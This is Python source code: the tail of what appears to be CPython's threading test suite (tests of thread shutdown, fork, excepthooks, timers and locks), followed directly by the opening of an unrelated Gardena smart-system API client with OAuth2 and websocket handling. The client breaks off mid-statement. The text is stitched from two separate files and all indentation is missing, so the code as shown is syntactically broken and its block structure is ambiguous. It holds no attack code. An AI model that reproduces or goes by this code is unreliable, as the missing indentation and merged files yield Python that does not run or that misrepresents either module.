print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=support.SHORT_TIMEOUT)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_running_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
support.wait_process(pid, exitcode=10)
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
from test import support
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
support.wait_process(pid, exitcode=0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
from test import support
def func():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
support.wait_process(pid, exitcode=0)
th = threading.Thread(target=func)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1 (func)\nTrue\nTrue\n")
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=support.SHORT_TIMEOUT), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
def test_gettrace(self):
def noop_trace(frame, event, arg):
# no operation
return noop_trace
old_trace = threading.gettrace()
try:
threading.settrace(noop_trace)
trace_func = threading.gettrace()
self.assertEqual(noop_trace,trace_func)
finally:
threading.settrace(old_trace)
def test_getprofile(self):
def fn(*args): pass
old_profile = threading.getprofile()
try:
threading.setprofile(fn)
self.assertEqual(fn, threading.getprofile())
finally:
threading.setprofile(old_profile)
@cpython_only
def test_shutdown_locks(self):
for daemon in (False, True):
with self.subTest(daemon=daemon):
event = threading.Event()
thread = threading.Thread(target=event.wait, daemon=daemon)
# Thread.start() must add lock to _shutdown_locks,
# but only for non-daemon thread
thread.start()
tstate_lock = thread._tstate_lock
if not daemon:
self.assertIn(tstate_lock, threading._shutdown_locks)
else:
self.assertNotIn(tstate_lock, threading._shutdown_locks)
# unblock the thread and join it
event.set()
thread.join()
# Thread._stop() must remove tstate_lock from _shutdown_locks.
# Daemon threads must never add it to _shutdown_locks.
self.assertNotIn(tstate_lock, threading._shutdown_locks)
def test_locals_at_exit(self):
# bpo-19466: thread locals must not be deleted before destructors
# are called
rc, out, err = assert_python_ok("-c", """if 1:
import threading
class Atexit:
def __del__(self):
print("thread_dict.atexit = %r" % thread_dict.atexit)
thread_dict = threading.local()
thread_dict.atexit = "value"
atexit = Atexit()
""")
self.assertEqual(out.rstrip(), b"thread_dict.atexit = 'value'")
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
from test import support
childpid = os.fork()
if childpid != 0:
# parent process
support.wait_process(childpid, exitcode=0)
sys.exit(0)
# child process
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
from test import support
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
# parent process
support.wait_process(childpid, exitcode=0)
sys.exit(0)
# child process
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
with open(os.__file__, 'rb') as in_f:
stuff = in_f.read(200)
with open(os.devnull, 'wb') as null_f:
null_f.write(stuff)
time.sleep(random.random() / 1995)
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
support.wait_process(pid, exitcode=50)
else:
os._exit(50)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(51)
else:
os._exit(52)
else:
support.wait_process(pid, exitcode=51)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def pipe(self):
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
if hasattr(os, 'set_blocking'):
os.set_blocking(r, False)
return (r, w)
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = f"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep({test.support.SHORT_TIMEOUT})
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
class ThreadRunFail(threading.Thread):
def run(self):
raise ValueError("run failed")
class ExceptHookTests(BaseTestCase):
def test_excepthook(self):
with support.captured_output("stderr") as stderr:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {thread.name}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("run failed")', stderr)
self.assertIn('ValueError: run failed', stderr)
@support.cpython_only
def test_excepthook_thread_None(self):
# threading.excepthook called with thread=None: log the thread
# identifier in this case.
with support.captured_output("stderr") as stderr:
try:
raise ValueError("bug")
except Exception as exc:
args = threading.ExceptHookArgs([*sys.exc_info(), None])
try:
threading.excepthook(args)
finally:
# Explicitly break a reference cycle
args = None
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {threading.get_ident()}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("bug")', stderr)
self.assertIn('ValueError: bug', stderr)
def test_system_exit(self):
class ThreadExit(threading.Thread):
def run(self):
sys.exit(1)
# threading.excepthook() silently ignores SystemExit
with support.captured_output("stderr") as stderr:
thread = ThreadExit()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(), '')
def test_custom_excepthook(self):
args = None
def hook(hook_args):
nonlocal args
args = hook_args
try:
with support.swap_attr(threading, 'excepthook', hook):
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(args.exc_type, ValueError)
self.assertEqual(str(args.exc_value), 'run failed')
self.assertEqual(args.exc_traceback, args.exc_value.__traceback__)
self.assertIs(args.thread, thread)
finally:
# Break reference cycle
args = None
def test_custom_excepthook_fail(self):
def threading_hook(args):
raise ValueError("threading_hook failed")
err_str = None
def sys_hook(exc_type, exc_value, exc_traceback):
nonlocal err_str
err_str = str(exc_value)
with support.swap_attr(threading, 'excepthook', threading_hook), \
support.swap_attr(sys, 'excepthook', sys_hook), \
support.captured_output('stderr') as stderr:
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(),
'Exception in threading.excepthook:\n')
self.assertEqual(err_str, 'threading_hook failed')
def test_original_excepthook(self):
def run_thread():
with support.captured_output("stderr") as output:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
return output.getvalue()
def threading_hook(args):
print("Running a thread failed", file=sys.stderr)
default_output = run_thread()
with support.swap_attr(threading, 'excepthook', threading_hook):
custom_hook_output = run_thread()
threading.excepthook = threading.__excepthook__
recovered_output = run_thread()
self.assertEqual(default_output, recovered_output)
self.assertNotEqual(default_output, custom_hook_output)
self.assertEqual(custom_hook_output, "Running a thread failed\n")
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
not_exported = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, not_exported=not_exported)
class InterruptMainTests(unittest.TestCase):
def test_interrupt_main_subthread(self):
# Calling start_new_thread with a function that executes interrupt_main
# should raise KeyboardInterrupt upon completion.
def call_interrupt():
_thread.interrupt_main()
t = threading.Thread(target=call_interrupt)
with self.assertRaises(KeyboardInterrupt):
t.start()
t.join()
t.join()
def test_interrupt_main_mainthread(self):
# Make sure that if interrupt_main is called in main thread that
# KeyboardInterrupt is raised instantly.
with self.assertRaises(KeyboardInterrupt):
_thread.interrupt_main()
def test_interrupt_main_noerror(self):
handler = signal.getsignal(signal.SIGINT)
try:
# No exception should arise.
signal.signal(signal.SIGINT, signal.SIG_IGN)
_thread.interrupt_main()
signal.signal(signal.SIGINT, signal.SIG_DFL)
_thread.interrupt_main()
finally:
# Restore original handler
signal.signal(signal.SIGINT, handler)
class AtexitTests(unittest.TestCase):
def test_atexit_output(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
def run_last():
print('parrot')
threading._register_atexit(run_last)
""")
self.assertFalse(err)
self.assertEqual(out.strip(), b'parrot')
def test_atexit_called_once(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
from unittest.mock import Mock
mock = Mock()
threading._register_atexit(mock)
mock.assert_not_called()
# force early shutdown to ensure it was called once
threading._shutdown()
mock.assert_called_once()
""")
self.assertFalse(err)
def test_atexit_after_shutdown(self):
# The only way to do this is by registering an atexit within
# an atexit, which is intended to raise an exception.
rc, out, err = assert_python_ok("-c", """if True:
import threading
def func():
pass
def run_last():
threading._register_atexit(func)
threading._register_atexit(run_last)
""")
self.assertTrue(err)
self.assertIn("RuntimeError: can't register atexit after shutdown",
err.decode())
if __name__ == "__main__":
unittest.main()
|
smart_system.py
|
import json
import logging
from contextlib import contextmanager
from json.decoder import JSONDecodeError
from oauthlib.oauth2 import LegacyApplicationClient
from requests_oauthlib import OAuth2Session
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
import websocket
from threading import Thread
from gardena.exceptions.authentication_exception import AuthenticationException
from gardena.location import Location
from gardena.devices.device_factory import DeviceFactory
class Client:
def __init__(self, smart_system=None, level=logging.WARN, location=None):
self.smart_system = smart_system
self.logger = logging.getLogger(__name__)
self.logger.setLevel(level)
self.live = False
self.location = location
self.should_stop = False
def on_message(self, ws, message):
self.smart_system.on_message(message)
def on_error(self, ws, error):
self.logger.error(f"error : {error}")
self.smart_system.set_ws_status(False)
def is_connected(self):
return self.live
def on_close(self, ws, close_status_code, close_msg):
self.live = False
self.logger.info("Connection close to gardena API")
self.smart_system.set_ws_status(False)
if not self.should_stop:
self.logger.info("Restarting websocket")
self.smart_system.start_ws(self.location)
def on_open(self, ws):
self.logger.info("Connected to Gardena API")
self.live = True
self.smart_system.set_ws_status(True)
# def run(*args):
# while self.live:
# time.sleep(1)
#
# Thread(target=run).start()
class SmartSystem:
"""Base class to communicate with gardena and handle network calls"""
def __init__(self, email=None, password=None, client_id=None, level=logging.INFO):
"""Constructor, create instance of gateway"""
if email is None or password is None or client_id is None:
raise ValueError(
"Arguments 'email', 'passwords' and 'client_id' are required"
)
logging.basicConfig(
level=level,
format='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S'
)
self.AUTHENTICATION_HOST = "https://api.authentication.husqvarnagroup.dev"
self.SMART_HOST = "https://api.smart.gardena.dev"
self.email = email
self.password = password
self.client_id = client_id
self.locations = {}
self.level = level
self.client = None
self.oauth_session = None
self.ws = None
self.is_ws_connected = False
self.ws_status_callback = None
self.supported_services = [
"COMMON",
"VALVE",
"VALVE_SET",
"SENSOR",
"MOWER",
"POWER_SOCKET",
"DEVICE",
]
self.logger = logging.getLogger(__name__)
self.logger.setLevel(level)
def create_header(self, include_json=False):
headers = {"Authorization-Provider": "husqvarna", "X-Api-Key": self.client_id}
if include_json:
headers["Content-Type"] = "application/vnd.api+json"
return headers
def authenticate(self):
"""
Authenticate and get tokens.
This function needs to be called first.
"""
url = self.AUTHENTICATION_HOST + "/v1/oauth2/token"
extra = {"client_id": self.client_id}
self.oauth_session = OAuth2Session(
client=LegacyApplicationClient(client_id=self.client_id),
auto_refresh_url=url,
auto_refresh_kwargs=extra,
token_updater=self.token_saver,
)
self.token = self.oauth_session.fetch_token(
token_url=url,
username=self.email,
password=self.password,
